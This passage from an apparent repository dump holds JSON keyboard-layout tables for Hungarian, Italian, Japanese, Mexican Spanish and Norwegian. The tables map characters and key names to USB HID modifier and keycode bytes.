\">\":\"02,00,64\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"CTRL-ALT\":\"05,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"{\":\"40,00,05\",\n \"[\":\"40,00,09\",\n \"]\":\"40,00,0a\",\n \"}\":\"40,00,11\",\n \"\\\\\":\"40,00,14\",\n \"@\":\"40,00,19\",\n \"|\":\"40,00,1a\",\n \"~\":\"40,00,1e\",\n \"^\":\"40,00,20\",\n \"`\":\"40,00,24\",\n \"COMMAND-CTRL-SHIFT\":\"40,00,24\",\n \"COMMAND-CTRL\":\"40,00,24\",\n \"COMMAND-OPTION-SHIFT'\":\"40,00,24\"\n}" }, { "path": "languages/hu.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\" Hungarian QWERTZ language made by Skeleton022\",\n \"__comment\":\" Added áéíóöőúüűÁÉÍÓÖŐÚÜŰ\",\n \"a\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \"m\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"q\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"w\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"z\":\"00,00,1c\",\n \"y\":\"00,00,1d\",\n \"1\":\"00,00,1e\",\n \"2\":\"00,00,1f\",\n \"3\":\"00,00,20\",\n \"4\":\"00,00,21\",\n \"5\":\"00,00,22\",\n \"6\":\"00,00,23\",\n \"7\":\"00,00,24\",\n \"8\":\"00,00,25\",\n \"9\":\"00,00,26\",\n \"ö\":\"00,00,27\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \"ü\":\"00,00,2d\",\n \"ó\":\"00,00,2e\",\n \"ő\":\"00,00,2f\",\n \"ú\":\"00,00,30\",\n \"ű\":\"00,00,31\",\n \"é\":\"00,00,33\",\n \"á\":\"00,00,34\",\n \"0\":\"00,00,35\",\n \",\":\"00,00,36\",\n \".\":\"00,00,37\",\n \"-\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"í\":\"00,00,64\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"A\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"M\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"Q\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"W\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Z\":\"02,00,1c\",\n \"Y\":\"02,00,1d\",\n \"'\":\"02,00,1e\",\n \"\\\"\":\"02,00,1f\",\n \"+\":\"02,00,20\",\n \"!\":\"02,00,21\",\n \"%\":\"02,00,22\",\n \"/\":\"02,00,23\",\n \"=\":\"02,00,24\",\n \"(\":\"02,00,25\",\n \")\":\"02,00,26\",\n \"Ö\":\"02,00,27\",\n \"Ü\":\"02,00,2d\",\n \"Ó\":\"02,00,2e\",\n \"Ő\":\"02,00,2f\",\n \"Ú\":\"02,00,30\",\n \"Ű\":\"02,00,31\",\n \"É\":\"02,00,33\",\n \"Á\":\"02,00,34\",\n \"?\":\"02,00,36\",\n \":\":\"02,00,37\",\n \"_\":\"02,00,38\",\n \"Í\":\"02,00,64\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"CTRL-ALT\":\"05,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"COMMAND-CTRL-SHIFT\":\"12,00,00\",\n \"COMMAND-CTRL\":\"12,00,00\",\n \"COMMAND-OPTION-SHIFT'\":\"12,00,00\",\n \"{\":\"40,00,05\",\n \"&\":\"40,00,06\",\n \"[\":\"40,00,09\",\n \"]\":\"40,00,0a\",\n \"}\":\"40,00,11\",\n \"\\\\\":\"40,00,14\",\n \"@\":\"40,00,19\",\n \"|\":\"40,00,1a\",\n \"#\":\"40,00,1b\",\n \">\":\"40,00,1d\",\n \"~\":\"40,00,1e\",\n \"^\":\"40,00,20\",\n \"`\":\"40,00,24\",\n \"$\":\"40,00,33\",\n \";\":\"40,00,36\",\n \"*\":\"40,00,38\",\n \"<\":\"40,00,64\"\n}\n" }, { "path": "languages/it.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\":\" \",\n \"a\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \"m\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"q\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"w\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"y\":\"00,00,1c\",\n \"z\":\"00,00,1d\",\n \"1\":\"00,00,1e\",\n \"2\":\"00,00,1f\",\n \"3\":\"00,00,20\",\n \"4\":\"00,00,21\",\n \"5\":\"00,00,22\",\n \"6\":\"00,00,23\",\n \"7\":\"00,00,24\",\n \"8\":\"00,00,25\",\n \"9\":\"00,00,26\",\n \"0\":\"00,00,27\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \"'\":\"00,00,2d\",\n \"+\":\"00,00,30\",\n \"\\\\\":\"00,00,35\",\n \"`\":\"00,00,35\",\n \",\":\"00,00,36\",\n \".\":\"00,00,37\",\n \"-\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"<\":\"00,00,64\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"A\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"M\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"Q\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"W\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Y\":\"02,00,1c\",\n \"Z\":\"02,00,1d\",\n \"!\":\"02,00,1e\",\n \"\\\"\":\"02,00,1f\",\n \"$\":\"02,00,21\",\n \"%\":\"02,00,22\",\n \"&\":\"02,00,23\",\n \"/\":\"02,00,24\",\n \"(\":\"02,00,25\",\n \")\":\"02,00,26\",\n \"=\":\"02,00,27\",\n \"?\":\"02,00,2d\",\n \"^\":\"02,00,2e\",\n \"*\":\"02,00,30\",\n \"|\":\"02,00,35\",\n \";\":\"02,00,36\",\n \":\":\"02,00,37\",\n \"_\":\"02,00,38\",\n \">\":\"02,00,64\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"CTRL-ALT\":\"05,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"[\":\"40,00,2f\",\n \"]\":\"40,00,30\",\n \"@\":\"40,00,33\",\n \"#\":\"40,00,34\",\n \"~\":\"40,00,34\",\n \"{\":\"42,00,2f\",\n \"}\":\"42,00,30\",\n \"COMMAND-CTRL-SHIFT\":\"40,00,30\",\n \"COMMAND-CTRL\":\"40,00,30\",\n \"COMMAND-OPTION-SHIFT'\":\"40,00,30\"\n}\n" }, { "path": "languages/jp.json", "content": "{\n \"__comment\": \"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\": \" \",\n \"__comment\": \"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\": \" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\": \" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\": \" \",\n \"__comment\": \"Definition of these 3 bytes can be found\",\n \"__comment\": \" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\": \" of document Device Class Definition for HID Version 1.11\",\n \"__comment\": \" - byte 1: Modifier keys\",\n \"__comment\": \" - byte 2: Reserved\",\n \"__comment\": \" - byte 3: Keycode 1\",\n \"__comment\": \" \",\n \"__comment\": \"Both documents can be obtained from link here\",\n \"__comment\": \" http://www.usb.org/developers/hidpage/\",\n \"__comment\": \" \",\n \"__comment\": \"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\": \" \",\n \"CTRL\": \"01,00,00\",\n \"CONTROL\": \"01,00,00\",\n \"SHIFT\": \"02,00,00\",\n \"ALT\": \"04,00,00\",\n \"GUI\": \"08,00,00\",\n \"WINDOWS\": \"08,00,00\",\n \"CTRL-ALT\": \"05,00,00\",\n \"CTRL-SHIFT\": \"03,00,00\",\n \"ALT-SHIFT\": \"06,00,00\",\n \"__comment\": \"Below 5 key combinations are for Mac OSX\",\n \"__comment\": \"Example: (COMMAND-OPTION SHIFT t) to open terminal\",\n \"COMMAND\": \"08,00,00\",\n \"COMMAND-CTRL\": \"09,00,00\",\n \"COMMAND-CTRL-SHIFT\": \"0B,00,00\",\n \"COMMAND-OPTION\": \"0C,00,00\",\n \"COMMAND-OPTION-SHIFT\": \"0E,00,00\",\n \"a\": \"00,00,04\",\n \"A\": \"02,00,04\",\n \"b\": \"00,00,05\",\n \"B\": \"02,00,05\",\n \"c\": \"00,00,06\",\n \"C\": \"02,00,06\",\n \"d\": \"00,00,07\",\n \"D\": \"02,00,07\",\n \"e\": \"00,00,08\",\n \"E\": \"02,00,08\",\n \"f\": \"00,00,09\",\n \"F\": \"02,00,09\",\n \"g\": \"00,00,0a\",\n \"G\": \"02,00,0a\",\n \"h\": \"00,00,0b\",\n \"H\": \"02,00,0b\",\n \"i\": \"00,00,0c\",\n \"I\": \"02,00,0c\",\n \"j\": \"00,00,0d\",\n \"J\": \"02,00,0d\",\n \"k\": \"00,00,0e\",\n \"K\": \"02,00,0e\",\n \"l\": \"00,00,0f\",\n \"L\": \"02,00,0f\",\n \"m\": \"00,00,10\",\n \"M\": \"02,00,10\",\n \"n\": \"00,00,11\",\n \"N\": \"02,00,11\",\n \"o\": \"00,00,12\",\n \"O\": \"02,00,12\",\n \"p\": \"00,00,13\",\n \"P\": \"02,00,13\",\n \"q\": \"00,00,14\",\n \"Q\": \"02,00,14\",\n \"r\": \"00,00,15\",\n \"R\": \"02,00,15\",\n \"s\": \"00,00,16\",\n \"S\": \"02,00,16\",\n \"t\": \"00,00,17\",\n \"T\": \"02,00,17\",\n \"u\": \"00,00,18\",\n \"U\": \"02,00,18\",\n \"v\": \"00,00,19\",\n \"V\": \"02,00,19\",\n \"w\": \"00,00,1a\",\n \"W\": \"02,00,1a\",\n \"x\": \"00,00,1b\",\n \"X\": \"02,00,1b\",\n \"y\": \"00,00,1c\",\n \"Y\": \"02,00,1c\",\n \"z\": \"00,00,1d\",\n \"Z\": \"02,00,1d\",\n \"1\": \"00,00,1e\",\n \"!\": \"02,00,1e\",\n \"2\": \"00,00,1f\",\n \"\\\"\": \"02,00,1f\",\n \"3\": \"00,00,20\",\n \"#\": \"02,00,20\",\n \"4\": \"00,00,21\",\n \"$\": \"02,00,21\",\n \"5\": \"00,00,22\",\n \"%\": \"02,00,22\",\n \"6\": \"00,00,23\",\n \"&\": \"02,00,23\",\n \"7\": \"00,00,24\",\n \"'\": \"02,00,24\",\n \"8\": \"00,00,25\",\n \"(\": \"02,00,25\",\n \"9\": \"00,00,26\",\n \")\": \"02,00,26\",\n \"0\": \"00,00,27\",\n \"ENTER\": \"00,00,28\",\n \"ESC\": \"00,00,29\",\n \"ESCAPE\": \"00,00,29\",\n \"BACKSPACE\": \"00,00,2a\",\n \"TAB\": \"00,00,2b\",\n \"ALT-TAB\": \"04,00,2b\",\n \"SPACE\": \"00,00,2c\",\n \" \": \"00,00,2c\",\n \"-\": \"00,00,2d\",\n \"=\": \"02,00,2d\",\n \"^\": \"00,00,2e\",\n \"~\": \"02,00,2e\",\n \"@\": \"00,00,2f\",\n \"`\": \"02,00,2f\",\n \"[\": \"00,00,30\",\n \"{\": \"02,00,30\",\n \"\\\\\": \"00,00,31\",\n \"|\": \"02,00,31\",\n \"]\": \"00,00,32\",\n \"}\": \"02,00,32\",\n \";\": \"00,00,33\",\n \"+\": \"02,00,33\",\n \":\": \"00,00,34\",\n \"*\": \"02,00,34\",\n \",\": \"00,00,36\",\n \"<\": \"02,00,36\",\n \".\": \"00,00,37\",\n \">\": \"02,00,37\",\n \"/\": \"00,00,38\",\n \"?\": \"02,00,38\",\n \"CAPSLOCK\": \"00,00,39\",\n \"F1\": \"00,00,3a\",\n \"F2\": \"00,00,3b\",\n \"F3\": \"00,00,3c\",\n \"F4\": \"00,00,3d\",\n \"F5\": \"00,00,3e\",\n \"F6\": \"00,00,3f\",\n \"F7\": \"00,00,40\",\n \"F8\": \"00,00,41\",\n \"F9\": \"00,00,42\",\n \"F10\": \"00,00,43\",\n \"F11\": \"00,00,44\",\n \"F12\": \"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\": \"00,00,47\",\n \"PAUSE\": \"00,00,48\",\n \"BREAK\": \"00,00,48\",\n \"INSERT\": \"00,00,49\",\n \"HOME\": \"00,00,4a\",\n \"PAGEUP\": \"00,00,4b\",\n \"DELETE\": \"00,00,4c\",\n \"DEL\": \"00,00,4c\",\n \"END\": \"00,00,4d\",\n \"PAGEDOWN\": \"00,00,4e\",\n \"RIGHTARROW\": \"00,00,4f\",\n \"RIGHT\": \"00,00,4f\",\n \"LEFTARROW\": \"00,00,50\",\n \"LEFT\": \"00,00,50\",\n \"DOWNARROW\": \"00,00,51\",\n \"DOWN\": \"00,00,51\",\n \"UPARROW\": \"00,00,52\",\n \"UP\": \"00,00,52\",\n \"NUMLOCK\": \"00,00,53\",\n \"MENU\": \"00,00,65\",\n \"APP\": \"00,00,65\"\n}\n" }, { "path": "languages/mx.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\":\" \",\n \"a\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \"m\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"q\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"w\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"y\":\"00,00,1c\",\n \"z\":\"00,00,1d\",\n \"1\":\"00,00,1e\",\n \"2\":\"00,00,1f\",\n \"3\":\"00,00,20\",\n \"4\":\"00,00,21\",\n \"5\":\"00,00,22\",\n \"6\":\"00,00,23\",\n \"7\":\"00,00,24\",\n \"8\":\"00,00,25\",\n \"9\":\"00,00,26\",\n \"0\":\"00,00,27\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \"'\":\"00,00,2d\",\n \"¿\":\"00,00,2e\",\n \"´\":\"00,00,2f\",\n \"+\":\"00,00,30\",\n \"}\":\"00,00,31\",\n \"ñ\":\"00,00,33\",\n \"{\":\"00,00,34\",\n \"|\":\"00,00,35\",\n \",\":\"00,00,36\",\n \".\":\"00,00,37\",\n \"-\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"<\":\"00,00,64\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"A\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"M\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"Q\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"W\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Y\":\"02,00,1c\",\n \"Z\":\"02,00,1d\",\n \"!\":\"02,00,1e\",\n \"\\\"\":\"02,00,1f\",\n \"#\":\"02,00,20\",\n \"$\":\"02,00,21\",\n \"%\":\"02,00,22\",\n \"&\":\"02,00,23\",\n \"/\":\"02,00,24\",\n \"(\":\"02,00,25\",\n \")\":\"02,00,26\",\n \"=\":\"02,00,27\",\n \"?\":\"02,00,2d\",\n \"¡\":\"02,00,2e\",\n \"¨\":\"02,00,2f\",\n \"*\":\"02,00,30\",\n \"]\":\"02,00,31\",\n \"Ñ\":\"02,00,33\",\n \"[\":\"02,00,34\",\n \"°\":\"02,00,35\",\n \";\":\"02,00,36\",\n \":\":\"02,00,37\",\n \"_\":\"02,00,38\",\n \">\":\"02,00,64\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"CTRL-ALT\":\"05,00,00\",\n \"\\\\\":\"05,00,2d\",\n \"~\":\"05,00,30\",\n \"`\":\"05,00,31\",\n \"^\":\"05,00,34\",\n \"¬\":\"05,00,35\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"COMMAND-CTRL-SHIFT\":\"12,00,00\",\n \"COMMAND-CTRL\":\"12,00,00\",\n \"COMMAND-OPTION-SHIFT\":\"12,00,00\",\n \"@\":\"40,00,14\"\n}\n" }, { "path": "languages/no.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\":\" \",\n \"a\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \"m\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"q\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"w\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"y\":\"00,00,1c\",\n \"z\":\"00,00,1d\",\n \"1\":\"00,00,1e\",\n \"2\":\"00,00,1f\",\n \"3\":\"00,00,20\",\n \"4\":\"00,00,21\",\n \"5\":\"00,00,22\",\n \"6\":\"00,00,23\",\n \"7\":\"00,00,24\",\n \"8\":\"00,00,25\",\n \"9\":\"00,00,26\",\n \"0\":\"00,00,27\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \"+\":\"00,00,2d\",\n \"\\\\\":\"00,00,2e\",\n \"'\":\"00,00,31\",\n \"|\":\"00,00,35\",\n \",\":\"00,00,36\",\n \".\":\"00,00,37\",\n \"-\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n 